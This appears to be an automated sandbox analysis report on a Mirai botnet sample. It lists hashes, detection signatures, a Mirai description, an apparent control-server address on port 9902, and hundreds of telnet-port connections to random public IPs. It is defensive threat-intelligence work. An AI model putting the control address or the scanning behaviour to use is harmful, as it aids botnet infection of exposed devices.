Linux Analysis Report
Q1BPEcSFNH.elf

Overview

General Information

Sample Name:	Q1BPEcSFNH.elf
Original Sample Name:	7fe53af62bda8d7e8673865f9e5ec70b.elf
Analysis ID:	1345560
MD5:	7fe53af62bda8d7e8673865f9e5ec70b
SHA1:	ad36ac4ffd5ef28b38bce8669873ac53b13fcd32
SHA256:	eedec4c30de491311570032616ad5c90f1e594e1cd6b335584ee6d44969c5338
Tags:	32elfmipsmirai
Infos:

Detection

Mirai

Score:	72
Range:	0 - 100
Whitelisted:	false

Signatures

Malicious sample detected (through community Yara rule)

Yara detected Mirai

Multi AV Scanner detection for submitted file

Sample is packed with UPX

Uses known network protocols on non-standard ports

Sample contains only a LOAD segment without any section mappings

Yara signature match

Uses the "uname" system call to query kernel version information (possible evasion)

Detected TCP or UDP traffic on non-standard ports

Sample listens on a socket

ELF contains segments with high entropy indicating compressed/encrypted content

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: Q1BPEcSFNH.elf	ReversingLabs: Detection: 21%
Source: Q1BPEcSFNH.elf	Virustotal: Detection: 22%			Perma Link

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51822
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51830
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51838
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51848
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51854
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51864
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51870
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51874
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51878
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51882
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51884
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51888
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51898
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51910
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51920
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54440
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54446
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54456
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54470
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54484
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54494
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54506
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54516
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54532
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54540
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54552
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54558
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54566
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54572
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54582

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.23:44648 -> 45.88.90.129:9902
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 105.171.252.116:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 200.149.233.15:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 66.139.175.161:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 113.5.216.193:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 188.85.163.120:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 159.245.52.213:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 187.131.220.7:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 92.187.131.183:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 175.152.130.205:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 149.152.248.136:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 175.254.189.182:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 125.179.21.171:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 91.14.175.200:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 111.30.137.228:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 100.142.65.52:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 128.85.102.211:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 79.73.38.70:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 176.101.11.229:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 63.142.176.205:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 80.219.201.184:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 13.214.26.93:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 108.165.112.127:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 161.201.37.157:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 195.198.0.150:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 47.14.88.105:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 5.24.226.115:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 180.255.11.47:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 92.138.62.28:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 216.21.208.67:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 53.197.251.172:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 9.155.17.80:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 65.200.156.192:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 186.144.132.85:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 17.49.88.80:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 20.95.252.175:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 119.242.139.230:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 89.250.96.161:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 76.12.14.91:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 101.42.223.69:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 2.47.99.23:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 105.88.179.174:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 177.70.101.194:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 20.95.235.87:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 175.56.16.121:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 71.242.238.173:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 143.36.220.134:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 39.190.58.254:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 58.49.228.111:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 119.94.214.161:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 2.146.124.209:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 93.149.150.14:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 9.222.29.95:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 67.121.32.142:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 220.222.153.239:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 98.153.185.137:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 47.33.39.43:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 105.145.228.200:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 120.7.125.97:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 177.133.166.8:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 74.221.154.251:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 35.56.238.148:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 105.217.8.122:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 38.11.52.162:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 132.48.141.211:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 40.221.236.203:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 206.240.245.230:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 44.39.252.1:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 190.131.105.46:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 150.55.83.70:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 198.168.241.46:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 90.114.248.174:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 143.254.94.108:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 176.231.243.203:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 66.190.45.63:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 121.38.196.220:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 174.181.44.90:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 58.87.134.244:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 153.85.196.173:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 34.100.96.187:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 217.224.75.118:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 87.206.3.127:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 128.23.121.253:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 110.214.166.134:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 158.139.37.195:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 44.87.34.9:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 211.240.40.20:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 161.29.169.98:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 164.39.199.5:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 101.243.123.182:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 20.63.169.131:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 129.21.95.98:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 143.165.142.105:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 128.190.128.59:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 104.230.33.39:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 31.144.143.94:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 61.56.59.207:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 103.89.248.139:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 219.201.187.18:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 19.18.43.234:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 19.9.18.52:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 194.215.220.179:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 106.146.91.59:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 39.70.195.151:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 184.208.249.250:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 32.89.200.118:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 203.106.98.197:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 132.120.60.18:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 146.107.55.203:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 105.152.36.126:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 59.17.16.125:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 150.224.208.245:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 169.251.5.170:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 185.11.18.90:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 39.32.209.145:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 148.119.123.225:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 57.193.142.47:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 181.131.249.181:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 12.197.248.203:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 219.127.249.35:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 130.164.124.205:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 171.86.225.203:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 75.68.118.243:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 84.152.111.236:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 175.175.61.6:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 68.96.169.184:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 168.216.44.132:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 38.81.210.135:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 93.239.95.129:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 116.226.140.180:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 204.41.217.169:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 196.253.9.75:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 149.221.100.124:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 199.69.245.186:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 196.156.232.176:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 61.101.194.127:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 125.68.208.55:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 85.235.26.240:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 17.161.223.62:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 78.231.201.62:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 82.150.164.34:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 53.129.22.247:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 187.36.13.134:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 85.76.233.222:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 87.143.37.8:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 128.48.172.172:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 101.14.134.63:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 195.160.47.16:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 114.161.236.150:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 196.84.245.144:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 68.191.163.162:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 217.86.89.93:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 149.133.85.96:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 136.183.69.126:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 118.20.65.135:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 4.57.141.155:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 87.240.175.63:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 138.3.27.141:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 111.202.147.127:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 132.101.98.246:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 5.200.129.155:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 166.188.192.38:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 83.40.75.130:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 74.70.26.74:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 89.252.229.199:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 107.36.14.205:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 81.101.219.55:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 59.220.193.120:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 90.50.178.160:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 147.32.233.173:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 220.226.100.27:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 213.44.220.243:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 62.151.30.212:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 4.95.112.110:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 209.196.110.190:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 99.40.11.23:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 218.145.138.132:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 168.204.187.65:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 139.205.223.14:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 111.227.59.217:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 178.86.227.186:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 85.132.154.113:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 122.49.137.111:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 106.177.204.164:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 71.100.75.118:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 88.83.196.40:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 160.80.14.216:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 158.193.138.52:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 92.133.120.45:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 109.190.135.147:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 54.135.194.62:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 109.120.101.252:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 46.254.87.237:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 174.166.255.111:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 150.247.249.38:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 8.203.20.45:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 111.84.189.9:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 152.22.56.67:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 102.120.91.89:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 223.116.150.238:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 74.108.54.22:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 149.255.242.27:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 58.172.18.118:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 96.255.118.243:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 153.123.247.181:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 32.238.65.218:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 130.111.214.39:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 205.145.125.177:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 144.245.234.24:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 176.146.172.151:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 121.229.117.175:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 72.215.138.164:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 58.110.125.144:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 90.169.156.234:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 213.106.178.11:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 208.249.128.106:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 53.140.95.173:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 219.108.16.54:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 89.182.129.252:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 61.170.79.71:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 221.223.141.221:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 211.9.181.27:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 60.255.56.212:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 36.213.224.145:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 181.238.227.16:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 62.98.35.42:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 129.110.51.68:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 45.124.12.70:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 219.9.65.46:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 130.27.124.109:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 207.33.230.123:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 9.30.253.157:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 138.254.238.205:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 153.82.164.39:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 108.146.168.226:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 32.107.6.143:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 176.62.164.136:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 95.141.246.53:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 190.198.180.13:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 190.235.98.142:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 57.150.25.226:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 174.237.207.49:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 32.98.126.100:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 157.246.211.209:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 185.237.46.192:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 82.101.209.176:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 78.158.251.95:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 124.99.34.159:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 20.76.137.70:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 144.5.171.111:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 135.196.141.71:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 186.208.252.216:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 32.198.31.190:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 66.26.221.150:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 210.1.244.34:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 120.45.208.49:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 108.100.38.70:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 205.132.179.153:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 161.217.191.203:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 82.67.255.57:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 68.187.86.105:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 143.70.21.5:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 88.51.70.65:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 194.216.251.200:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 181.83.52.167:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 13.223.6.48:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 164.42.165.65:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 82.187.216.100:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 23.223.237.72:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 63.11.123.87:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 195.152.8.84:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 48.140.98.95:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 157.32.144.159:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 200.185.251.60:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 148.218.226.40:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 23.135.15.150:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 160.181.66.134:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 157.5.115.177:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 124.221.199.203:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 209.249.76.71:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 73.25.191.166:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 32.179.201.85:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 195.224.92.62:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 69.242.122.185:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 41.186.74.107:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 183.116.16.182:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 32.9.179.173:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 76.126.147.176:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 23.54.123.189:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 200.212.62.144:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 54.19.151.226:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 140.198.247.234:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 96.75.95.152:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 24.111.205.93:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 122.118.242.94:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 38.25.100.254:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 48.242.32.137:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 85.204.159.0:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 27.193.198.129:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 34.159.88.143:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 188.234.139.24:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 2.150.8.59:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 203.209.217.132:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 58.0.48.36:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 145.129.253.33:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 110.99.171.190:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 110.225.235.89:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 61.19.44.241:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 8.222.212.138:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 182.78.23.205:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 45.91.161.138:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 115.135.24.162:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 42.105.223.139:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 157.17.202.195:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 9.212.5.44:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 67.86.214.95:2323
